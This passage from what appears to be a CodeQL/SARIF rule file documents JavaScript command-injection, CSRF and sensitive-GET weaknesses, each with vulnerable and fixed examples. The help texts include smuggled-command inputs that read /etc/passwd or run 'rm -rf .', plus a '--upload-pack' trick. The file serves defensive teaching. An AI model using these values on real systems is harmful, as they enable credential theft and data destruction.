This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. 
In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Building a shell command string with values from the enclosing\n environment may cause subtle bugs or vulnerabilities.", - "id" : "js/shell-command-injection-from-environment", - "kind" : "path-problem", - "name" : "Shell command built from environment values", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/second-order-command-line-injection", - "name" : "js/second-order-command-line-injection", - "shortDescription" : { - "text" : "Second order command injection" - }, - "fullDescription" : { - "text" : "Using user-controlled data as arguments to some 
commands, such as git clone, can allow arbitrary commands to be executed." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: 
[CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ 
"correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using user-controlled data as arguments to some commands, such as git clone,\n can allow arbitrary commands to be executed.", - "id" : "js/second-order-command-line-injection", - "kind" : "path-problem", - "name" : "Second order command injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.0" - } - }, { - "id" : "js/command-line-injection", - "name" : "js/command-line-injection", - "shortDescription" : { - "text" : "Uncontrolled command line" - }, - "fullDescription" : { - "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", - "id" : "js/command-line-injection", - "kind" : "path-problem", - "name" : "Uncontrolled command line", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/unnecessary-use-of-cat", - "name" : "js/unnecessary-use-of-cat", - "shortDescription" : { - "text" : "Unnecessary use of `cat` process" - }, - "fullDescription" : { - "text" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n", - "markdown" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security 
vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "maintainability", "external/cwe/cwe-078" ], - "description" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.", - "id" : "js/unnecessary-use-of-cat", - "kind" : "problem", - "name" : "Unnecessary use of `cat` process", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.3" - } - }, { - "id" : "js/shell-command-constructed-from-input", - "name" : "js/shell-command-constructed-from-input", - "shortDescription" : { - "text" : "Unsafe shell command constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. 
This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", - "id" : "js/shell-command-constructed-from-input", - "kind" : "path-problem", - "name" : "Unsafe shell command constructed from library input", - 
"precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.3" - } - }, { - "id" : "js/sensitive-get-query", - "name" : "js/sensitive-get-query", - "shortDescription" : { - "text" : "Sensitive data read from GET request" - }, - "fullDescription" : { - "text" : "Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. 
The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n", - "markdown" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. 
Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-598" ], - "description" : "Placing sensitive data in a GET request increases the risk of\n the data being exposed to an attacker.", - "id" : 
"js/sensitive-get-query", - "kind" : "problem", - "name" : "Sensitive data read from GET request", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/missing-token-validation", - "name" : "js/missing-token-validation", - "shortDescription" : { - "text" : "Missing CSRF middleware" - }, - "fullDescription" : { - "text" : "Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. 
An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n", - "markdown" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. 
A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... 
update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-352" ], - "description" : "Using cookies without CSRF protection may allow malicious websites to\n submit requests on behalf of the user.", - "id" : "js/missing-token-validation", - "kind" : "problem", - "name" : "Missing CSRF middleware", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/server-side-unvalidated-url-redirection", - "name" : "js/server-side-unvalidated-url-redirection", - "shortDescription" : { - "text" : "Server-side URL redirect" - }, - "fullDescription" : { - "text" : "Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
